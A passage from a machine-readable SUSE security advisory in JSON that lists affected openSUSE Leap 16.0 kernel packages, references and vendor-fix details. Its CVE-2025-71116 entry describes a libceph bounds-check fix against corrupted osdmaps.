"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-71114"
},
{
"cve": "CVE-2025-71116",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71116"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: make decode_pool() more resilient against corrupted osdmaps\n\nIf the osdmap is (maliciously) corrupted such that the encoded length\nof ceph_pg_pool envelope is less than what is expected for a particular\nencoding version, out-of-bounds reads may ensue because the only bounds\ncheck that is there is based on that length value.\n\nThis patch adds explicit bounds checks for each field that is decoded\nor skipped.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71116",
"url": "https://www.suse.com/security/cve/CVE-2025-71116"
},
{
"category": "external",
"summary": "SUSE Bug 1256744 for CVE-2025-71116",
"url": "https://bugzilla.suse.com/1256744"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
